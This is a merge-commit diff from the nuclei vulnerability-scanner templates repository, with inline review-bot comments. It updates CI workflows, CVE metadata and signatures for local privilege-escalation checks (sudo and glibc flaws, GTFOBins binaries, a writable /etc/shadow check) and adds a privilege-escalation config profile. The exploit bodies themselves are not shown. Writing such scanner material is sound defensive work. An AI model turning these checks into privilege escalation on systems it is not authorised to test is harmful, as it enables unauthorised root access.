Merge branch 'main' into phishing-templates

patch-1
Prince Chaddha 2024-03-08 13:04:54 +05:30 committed by GitHub
commit c287ba0142
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
744 changed files with 14094 additions and 7290 deletions


@ -1,22 +0,0 @@
name: 🗑️ Cache Purge
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
deploy:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
# Wait for 5 minutes
- name: Wait for 2 minutes
run: sleep 120
- name: Purge cache
uses: jakejarvis/cloudflare-purge-action@master
env:
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}


@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
- name: Yamllint
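Review bot: The new `if: github.repository == 'projectdiscovery/nuclei-templates'` guard stops the job in forks, but it is not a defence against fork-originated `pull_request` runs, because for that event `github.repository` is still the base repository; whether that trigger is present cannot be seen here, since the `on:` block lies above the hunk. If the guard is only meant to spare forks CI time it is fine; if it is meant to gate secrets, rely on GitHub's fork-secret restriction and environment protection rather than this condition. Separately, the checkout on the following context line is pinned to the floating `v4` tag; a repo that publishes signed templates would normally pin to a full commit SHA (`uses: actions/checkout@<sha> # v4`), and the same applies to the other workflows this commit touches.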


@ -11,6 +11,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
with:


@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
with:


@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- uses: actions/checkout@v4
with:


@ -3,43 +3,10 @@ on:
push:
paths:
- '.new-additions'
- 'code/cves/2023/CVE-2023-6246.yaml'
- 'http/cves/2007/CVE-2007-3010.yaml'
- 'http/cves/2011/CVE-2011-4640.yaml'
- 'http/cves/2021/CVE-2021-40651.yaml'
- 'http/cves/2022/CVE-2022-38131.yaml'
- 'http/cves/2023/CVE-2023-28662.yaml'
- 'http/cves/2023/CVE-2023-47115.yaml'
- 'http/cves/2023/CVE-2023-52085.yaml'
- 'http/cves/2023/CVE-2023-6360.yaml'
- 'http/cves/2023/CVE-2023-6909.yaml'
- 'http/cves/2024/CVE-2024-1061.yaml'
- 'http/cves/2024/CVE-2024-21644.yaml'
- 'http/cves/2024/CVE-2024-21645.yaml'
- 'http/cves/2024/CVE-2024-21893.yaml'
- 'http/cves/2024/CVE-2024-22024.yaml'
- 'http/default-logins/webmethod/webmethod-integration-server-default-login.yaml'
- 'http/exposed-panels/apigee-panel.yaml'
- 'http/exposed-panels/dockge-panel.yaml'
- 'http/exposed-panels/easyjob-panel.yaml'
- 'http/exposed-panels/friendica-panel.yaml'
- 'http/exposed-panels/ivanti-connect-secure-panel.yaml'
- 'http/exposed-panels/juniper-panel.yaml'
- 'http/exposed-panels/ms-exchange-web-service.yaml'
- 'http/exposed-panels/pairdrop-panel.yaml'
- 'http/exposed-panels/passbolt-panel.yaml'
- 'http/exposed-panels/sentry-panel.yaml'
- 'http/exposed-panels/vistaweb-panel.yaml'
- 'http/exposures/logs/teampass-ldap.yaml'
- 'http/miscellaneous/balada-injector-malware.yaml'
- 'http/misconfiguration/node-express-dev-env.yaml'
- 'http/misconfiguration/sap/sap-public-admin.yaml'
- 'http/technologies/google/chromecast-detect.yaml'
- 'http/technologies/identity-server-v3-detect.yaml'
- 'http/vulnerabilities/wordpress/wp-user-enum.yaml'
workflow_dispatch:
jobs:
triggerRemoteWorkflow:
if: github.repository == 'projectdiscovery/nuclei-templates'
runs-on: ubuntu-latest
steps:
- name: Trigger Remote Workflow with curl
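Review bot: After this change the `push` trigger has only a `paths` filter (`'.new-additions'`) and no `branches` filter between `push:` and `workflow_dispatch:`, so a push on any branch of the upstream repository that touches `.new-additions` — a feature branch like the one this merge lands on included — fires the remote-trigger job, and the repository guard does nothing to narrow that. If the remote workflow is meant to follow `main` only, add `branches: [main]` under `push:` alongside the `paths` filter. The curl step body and the `on:` header sit outside the hunk, so I cannot confirm what credential the step sends; presumably it is a dedicated fine-scoped secret rather than `GITHUB_TOKEN`, which is worth checking given the wider set of branches that can now trigger it.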


@ -6,6 +6,7 @@ on:
jobs:
Update:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- name: Check out repository code
uses: actions/checkout@v4


@ -1,34 +0,0 @@
code/cves/2023/CVE-2023-6246.yaml
http/cves/2007/CVE-2007-3010.yaml
http/cves/2011/CVE-2011-4640.yaml
http/cves/2021/CVE-2021-40651.yaml
http/cves/2022/CVE-2022-38131.yaml
http/cves/2023/CVE-2023-28662.yaml
http/cves/2023/CVE-2023-47115.yaml
http/cves/2023/CVE-2023-52085.yaml
http/cves/2023/CVE-2023-6360.yaml
http/cves/2023/CVE-2023-6909.yaml
http/cves/2024/CVE-2024-1061.yaml
http/cves/2024/CVE-2024-21644.yaml
http/cves/2024/CVE-2024-21645.yaml
http/cves/2024/CVE-2024-21893.yaml
http/cves/2024/CVE-2024-22024.yaml
http/default-logins/webmethod/webmethod-integration-server-default-login.yaml
http/exposed-panels/apigee-panel.yaml
http/exposed-panels/dockge-panel.yaml
http/exposed-panels/easyjob-panel.yaml
http/exposed-panels/friendica-panel.yaml
http/exposed-panels/ivanti-connect-secure-panel.yaml
http/exposed-panels/juniper-panel.yaml
http/exposed-panels/ms-exchange-web-service.yaml
http/exposed-panels/pairdrop-panel.yaml
http/exposed-panels/passbolt-panel.yaml
http/exposed-panels/sentry-panel.yaml
http/exposed-panels/vistaweb-panel.yaml
http/exposures/logs/teampass-ldap.yaml
http/miscellaneous/balada-injector-malware.yaml
http/misconfiguration/node-express-dev-env.yaml
http/misconfiguration/sap/sap-public-admin.yaml
http/technologies/google/chromecast-detect.yaml
http/technologies/identity-server-v3-detect.yaml
http/vulnerabilities/wordpress/wp-user-enum.yaml


@ -18,7 +18,6 @@ tags:
- "local"
- "brute-force"
- "bruteforce"
- "privesc"
- "phishing"
# The following templates have been excluded because they have weak matchers and may generate FP results.


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2343 | dhiyaneshdk | 1137 | http | 6975 | info | 3357 | file | 312 |
| panel | 1054 | daffainfo | 863 | file | 312 | high | 1550 | dns | 21 |
| wordpress | 941 | dwisiswant0 | 801 | workflows | 191 | medium | 1450 | | |
| xss | 887 | pikpikcu | 353 | network | 132 | critical | 943 | | |
| exposure | 860 | pussycat0x | 313 | code | 79 | low | 255 | | |
| wp-plugin | 816 | ritikchaddha | 300 | ssl | 27 | unknown | 34 | | |
| cve | 2386 | dhiyaneshdk | 1189 | http | 7104 | info | 3421 | file | 312 |
| panel | 1085 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 |
| wordpress | 953 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | |
| exposure | 892 | pikpikcu | 353 | network | 132 | critical | 959 | | |
| xss | 892 | pussycat0x | 313 | code | 80 | low | 258 | | |
| wp-plugin | 828 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | |
| osint | 678 | pdteam | 285 | javascript | 26 | | | | |
| tech | 653 | ricardomaia | 231 | dns | 18 | | | | |
| lfi | 628 | geeknik | 225 | headless | 11 | | | | |
| tech | 659 | ricardomaia | 231 | dns | 18 | | | | |
| lfi | 634 | geeknik | 227 | headless | 11 | | | | |
| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | |
**552 directories, 8061 files**.
**569 directories, 8193 files**.
</td>
</tr>




@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2343 | dhiyaneshdk | 1137 | http | 6975 | info | 3357 | file | 312 |
| panel | 1054 | daffainfo | 863 | file | 312 | high | 1550 | dns | 21 |
| wordpress | 941 | dwisiswant0 | 801 | workflows | 191 | medium | 1450 | | |
| xss | 887 | pikpikcu | 353 | network | 132 | critical | 943 | | |
| exposure | 860 | pussycat0x | 313 | code | 79 | low | 255 | | |
| wp-plugin | 816 | ritikchaddha | 300 | ssl | 27 | unknown | 34 | | |
| cve | 2386 | dhiyaneshdk | 1189 | http | 7104 | info | 3421 | file | 312 |
| panel | 1085 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 |
| wordpress | 953 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | |
| exposure | 892 | pikpikcu | 353 | network | 132 | critical | 959 | | |
| xss | 892 | pussycat0x | 313 | code | 80 | low | 258 | | |
| wp-plugin | 828 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | |
| osint | 678 | pdteam | 285 | javascript | 26 | | | | |
| tech | 653 | ricardomaia | 231 | dns | 18 | | | | |
| lfi | 628 | geeknik | 225 | headless | 11 | | | | |
| tech | 659 | ricardomaia | 231 | dns | 18 | | | | |
| lfi | 634 | geeknik | 227 | headless | 11 | | | | |
| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | |


@ -9,7 +9,7 @@ info:
metadata:
verified: true
max-request: 1
tags: cloud,cloud-enum,azure,brute-force,enum
tags: cloud,cloud-enum,azure,bruteforce,enum
self-contained: true
@ -63,4 +63,4 @@ dns:
part: answer
words:
- "IN\tA"
# digest: 4a0a0047304502210099044650fcae81add403703f5262b5673a46eca139d542c751548b0f7aadcc9c022038fa381a6c09a5a8341ac70d7a4ed8339a48c947bbdd3f5bd22e5a336daf9cec:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ad529d9d011c813ce7e0cb419a8440ca3f0bef3ca063b85560dbc678d6eb7056022022aa46f55179a7b72c6a02dcda0444e0aba98ddaa781c8118d39acd5cafdeaaf:922c64590222798bb761d5b6d8e72950


@ -9,11 +9,22 @@ info:
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.exploit-db.com/exploits/47502
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
- http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-14287
cwe-id: CWE-755
epss-score: 0.34299
epss-percentile: 0.96958
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: canonical
product: ubuntu_linux
vendor: sudo_project
product: sudo
tags: cve,cve2019,sudo,code,linux,privesc,local,canonical
self-contained: true
@ -36,4 +47,4 @@ code:
- '!contains(code_1_response, "root")'
- 'contains(code_2_response, "root")'
condition: and
# digest: 4b0a00483046022100f4f8e722b5f42a0123c6f1f8f54ac645f9d05fcd3cfef40c38b610291978a5e00221009d44ff15e4eea65e3fcb18aeece52355879b009f9a7246c145abdaf23807e2ea:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402205d953c6f0c1352f39f1035d518dc38cffe2165dfb1f4ddd270434e7dbb790c1102200423935d03c0eafff4702b083c0d5da821affb591901209cd6d087644114abdf:922c64590222798bb761d5b6d8e72950
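Review bot: The `tags` line still carries `canonical` even though the metadata two lines above now says `vendor: sudo_project` / `product: sudo`; the tag looks like a leftover from the old `vendor: canonical` entry and should go, e.g. `tags: cve,cve2019,sudo,code,linux,privesc,local`, since vendor attribution is already captured in metadata and the CPE is `sudo_project:sudo`. Any edit to that line invalidates the `# digest:` signature at the bottom of the file, so the template has to be re-signed. The `code:` block whose matchers close the hunk starts outside it.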


@ -10,8 +10,20 @@ info:
- https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
- https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
- https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff
- http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html
- http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2021-3156
cwe-id: CWE-193
epss-score: 0.97085
epss-percentile: 0.99752
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: sudo_project
product: sudo
tags: cve,cve2021,sudo,code,linux,privesc,local,kev
self-contained: true
@ -28,4 +40,4 @@ code:
- "malloc(): memory corruption"
- "Aborted (core dumped)"
condition: and
# digest: 490a00463044022074b8ca1a10aca438432f3b6e55023b9c80357eb5a6f2ac795774b7d44e85188e02201a3af75f86a975548121afe1ab1faf6ade2d1e89d05200b4e6990e97af56af36:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220494a1c88897c9697f8d55a15b5ba0990a64225974efa03ca485ae5ebe4c2bcf0022019eb5fcd9dd61429f3964b64b263aec23e0193b30d695284d275818b9c38812d:922c64590222798bb761d5b6d8e72950
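Review bot: The added reference `http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html` does not appear to belong to sudo CVE-2021-3156 — by its title it describes the glibc syslog overflow, i.e. CVE-2023-6246, which has its own template in this same commit — so it should be verified and dropped or moved there. The other additions (CVSS 7.8 AV:L, CWE-193, the `kev` tag) are consistent with each other as far as the hunk shows. Note that the matcher words at the bottom (`malloc(): memory corruption`, `Aborted (core dumped)`) depend on glibc's allocator diagnostics being printed, so the result is allocator-specific; the `code:` block that produces them starts outside the hunk.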


@ -21,8 +21,8 @@ info:
cvss-score: 7.8
cve-id: CVE-2023-2640
cwe-id: CWE-863
epss-score: 0.00047
epss-percentile: 0.14754
epss-score: 0.00174
epss-percentile: 0.53697
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
metadata:
verified: true
@ -54,4 +54,4 @@ code:
- '!contains(code_1_response, "(root)")'
- 'contains(code_2_response, "(root)")'
condition: and
# digest: 4a0a00473045022100a20c4d30517d6bd96f1a97d3fca9e29bd1f686eeb9192a3f503a5bddffeda9fe022020188e4f25e79706197eab61598d64679c02828a0aedf7f496b5fbe14707ec90:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950


@ -10,16 +10,21 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4911
- https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
- https://www.youtube.com/watch?v=1iV-CD9Apn8
- http://www.openwall.com/lists/oss-security/2023/10/05/1
- http://www.openwall.com/lists/oss-security/2023/10/13/11
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2023-4911
cwe-id: CWE-787
cpe: cpe:2.3:a:gnu:glibc:-:*:*:*:*:*:*:*
cwe-id: CWE-787,CWE-122
epss-score: 0.0171
epss-percentile: 0.87439
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: glibc
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local
vendor: gnu
product: glibc
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev
self-contained: true
code:
@ -34,4 +39,4 @@ code:
- type: word
words:
- "139" # Segmentation Fault Exit Code
# digest: 4a0a004730450220420ab1d35c89225b917a344669e743fa83b79698910c4f87a5124f2dfaae54cd022100d122ece9eaba7f9bfc32d229e79d56b127da02ce4e5cf4034ecebfd9da56a9a2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950


@ -9,15 +9,21 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6246
- https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt
- https://access.redhat.com/security/cve/CVE-2023-6246
- https://bugzilla.redhat.com/show_bug.cgi?id=2249053
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2023-6246
cwe-id: CWE-787
cwe-id: CWE-787,CWE-122
epss-score: 0.00383
epss-percentile: 0.72435
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: glibc
vendor: gnu
product: glibc
tags: cve,cve2023,code,glibc,linux,privesc,local
self-contained: true
@ -33,4 +39,4 @@ code:
- type: word
words:
- "127" # Segmentation Fault Exit Code
# digest: 4a0a00473045022100fec914f6ee85b53ab611e26476cba7da42e11cdcb33c935a2d003c74c7312b1302207b65c84f8435932f1aa050019f6aaf899442187cf9630df934cf9086bd94a2f6:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950
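Review bot: The matcher word `"127"` is annotated `# Segmentation Fault Exit Code`, but in POSIX shells 127 means "command not found", while a SIGSEGV termination surfaces as 139 (128+11) — which is exactly what the sibling CVE-2023-4911 template in this commit matches with its own `"139"` line. Unless the exploit harness deliberately exits 127, matching on it would flag a host where the invoked command is simply absent, a false positive rather than a detection; the code block that produces the status starts outside the hunk, so check which exit code it really yields and correct either the value or the comment. The `# digest:` on the last line must be regenerated after any such change.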


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/choom/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,choom,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a0047304502203b1238ca7d9be64f51e9162022deaf76b02898053cbb3511377e76228d3d79ef0221008b6aa349a17b0a16a0d0949f1797c8e111d2498185b88fe99c326c60c59167c9:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100cd0a7dc9b51ef8f3f850d3fde75e025e13c61b464ac044825ac70107c66db1de0220290c09bd78a4e25f5cabc659f9441a3c168a1ca2c226f0ddf9316de01eb30461:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/find/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,find,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4b0a0048304602210093227e768a659e1747e4dd5d82e25ade3f152549f159b967327082c90677fc5e022100ba7d7a12344d88ac9ec3c0832b25af9d1ef25fe4470e6963b2f3ae814c844e89:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402207f55b1ac220ad114cf5cd2341a388a3860f134489b662ff708d8553b7156207a02201bddad6e9a46aa5b077f01de8b269b2797007741d8c6f38b9ddc7724462497e5:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/lua/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,lua,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a00473045022033fd3387c3085b4f8e3a7ced68a4e324ba82f7e683a8c29e5ab32c1975a8fe4b02210097eb732caf95609123a361436265388bba8c2c95fcba6ddaf6504d3a5b19c19f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202ed356f302529ce69de66a24987b78693c5d679a4340425ad29a76fa63db81ab022100a1157d5ab30c98ef4366d8cba600703686a43211b15ce7d17e4fc07a79db5a8f:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/mysql/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,mysql,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4b0a00483046022100fa6772f8e48a5c9ac87ddba3ecc262a59d16d9cba527623da8f5cdf9509e44880221008cff1c5a77c27a1f59d943884498c8d1499da98e6ecf7e1d63851de4ae9fa76c:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205cfddd58041ea672c83a850b34e77b9b635e71f934118d2a1ab9ab3ca660e13b022100eec2e1232af1d0b4686fc284278197db41fa3a289488abb2936a1186b85e3e26:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/node/
metadata:
max-request: 4
verified: true
max-request: 4
tags: code,linux,node,privesc,local
self-contained: true
@ -53,4 +53,4 @@ code:
- 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")'
condition: or
# digest: 4b0a00483046022100e32f25ba4a83d9d265aa187532f0090ba2fdf1beb89235113b4caeed36413ac30221008ecd529618da3ad2ed65e939b4233529614a005b87fd760bbeeb95de2e78746f:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c2fb7e0f1c8874aa30b7cbf614269bbd607e7679a738d4e4b6e6d5cafdf8faa1022100af88ace2a97d251334aeefafdfbd07471443304b4505d49f1edf432f53b5e43a:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/rc/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,rc,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a004730450220665e08a8d241b76abc6c9f908b6c953eeebccc153af1c165958c388f1a57c3eb02210091d8e2364f4c48b2fd9d8b64222760ce398677386e5d185fc86425ea5ed10527:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202a315bdc26f4d35efa4a6f698d5324b05e6f7d849772f27996dd0e04ac0edd5b022100cb3566b03c81b4ced70cb1bf221db42da3f9262c3ce4790664bc215a0b623abf:922c64590222798bb761d5b6d8e72950


@ -8,8 +8,8 @@ info:
The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.
reference: https://gtfobins.github.io/gtfobins/run-parts/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,run-parts,privesc,local
self-contained: true
@ -45,4 +45,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 490a00463044022055bdbe38258f303b3247dcaaec655d2aca77ff0d5e3d83a8e763840384618a7c02204591a5abce03bc68b647b84a4a4fd59da6d3713256d3494aadc43cf2076778dd:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022058411677d700beae571edc83b5da8ff31eaa193dac73ba1515a220842ccabc8d0220151cca60c8ad28b2934984be7d6a187d3dd02ee9cac9a5cc3cd0af97273c6bca:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/strace/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,strace,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a004730450221008a56962d3e0bfec8153fae52f4693ee5b8065098d3b7c5e16b5c2f481dcaaeb8022077e7fc1be8079fde76cbf09b10718038a4e013725c9955a91d5b024d02bdd27f:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502202b121064fdd29dfb40970b3956fcfb830cc7150f895b56913870f21c1f2f5e85022100fd214757ef5ac44a07cfc6fcdcf6da1fe59cd2b44f98829f01fc6af0c58045d8:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/torify/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,torify,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 4a0a00473045022100fe967badaa42178c43d6c5f965ebd2205cd5636ddceeece364aedd793b317d1902207ad0bc797b16421928d1ec9016ba53809758b9f7603effab908a27decbc3cc74:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221008ca7aa24f7f8fa13b8d43c96981d8fd78a382752f6e2c69dfab164443972b747022100d307d8b9c2054d4731db696fc13198afed46d5b1215a6899b56533661240fc91:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/view/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,view,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 490a0046304402207dc9a1ca06fcde2705d1a72ee2f792eff2f81f5d00def77fa54eec5d7717c19e02200c984a4f0d0cf94baa16c355ab52265f3dd281cac5bdd92f8ef9242efc087166:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ed64ed48009962a92006b2ce803d0c5189e91ced727a841bc8c31e5d98d1a9b5022009f19b7df531fecde9b1303555d1ec29ba63a49ca1c439b6f48f46552d2d4bb4:922c64590222798bb761d5b6d8e72950


@ -9,8 +9,8 @@ info:
reference:
- https://gtfobins.github.io/gtfobins/xargs/
metadata:
max-request: 3
verified: true
max-request: 3
tags: code,linux,xargs,privesc,local
self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")'
condition: or
# digest: 490a0046304402205fac35cdd5142e3afd382d38b77be0b7105cfc23884e7ac5cbba8aa91cfc2bb002202b6c7ebae29c5c300052a85a39f3e30b71788d590bc40b797c1ee96c1f00f267:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022052f887093022e061b40da1eae5a8b4aa8a5f267dfd5f22db005a9076db73cc9a02210093f126e5d0229cf686f3c547dc3466e89afb2a7bf57bbeb790acf65376fcd047:922c64590222798bb761d5b6d8e72950


@ -7,8 +7,8 @@ info:
reference:
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow
metadata:
max-request: 2
verified: true
max-request: 2
tags: code,linux,privesc,local
self-contained: true
@ -42,4 +42,4 @@ code:
words:
- "Not readable and not writable"
negative: true
# digest: 490a004630440220516036fa8622068621421ac043a6fb20b6551a6ca3d7851726474cfff7e4d9f902205a1a9ce09b5827f39e2311e6716793a917e29383f5e4d4a4b9a56925afa68e61:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402206152b0b3fe7a164b5583cb921d799f47fdcf9f30da2c32cbbb7248aa7068a13102200b3f49d97a93659dc9f1b56c518921e7e3597478d55eddb1cfc6a76dd45cb968:922c64590222798bb761d5b6d8e72950

39
config/README.md Normal file

@ -0,0 +1,39 @@
## About
This directory hosts Nuclei configuration profiles specifically designed for various use cases, including Bug Bounty, OSINT, and Compliance. The centerpiece of these configurations is the `recommended.yml` file, which offers a handpicked selection of templates that are both efficient and relevant for the majority of scanning scenarios. This curated approach is intended to provide a more focused scanning experience, reducing the occurrence of irrelevant results that often accompany broader scans.
## Usage
The Nuclei configuration profiles are straightforward to integrate into your existing scanning workflows. Below are guidelines on how to utilize the `recommended.yml` configuration for a streamlined scanning process, as well as instructions for customizing your scans to fit specific needs.
### Using the Recommended Configuration
To execute a scan with the `recommended.yml` configuration, which has been optimized for general use to yield efficient and relevant results, use the following command:
```
nuclei -config ~/nuclei-templates/config/recommended.yml
```
## Customizing Your Scanning Configuration
If you have specific requirements or wish to modify the focus of your scans, you can create a custom configuration file based on the structure of recommended.yml. Adjust the template selections to fit your targeted scanning objectives. Once your configuration is set, run Nuclei using your custom file with the command:
```
nuclei -config your-custom-config.yml
```
## Examples
Here are examples of how to run scans for specific scenarios:
#### Running Local Privilege Escalation Checks
For targeting local privilege escalation vulnerabilities, utilize the dedicated config as follows:
```
nuclei -config ~/nuclei-templates/config/privilege-escalation.yml
```
#### Config Focusing on OSINT
```
nuclei -config ~/nuclei-templates/config/osint.yml
```


@ -0,0 +1,7 @@
code: true
tags:
- privesc
include-tags:
- local
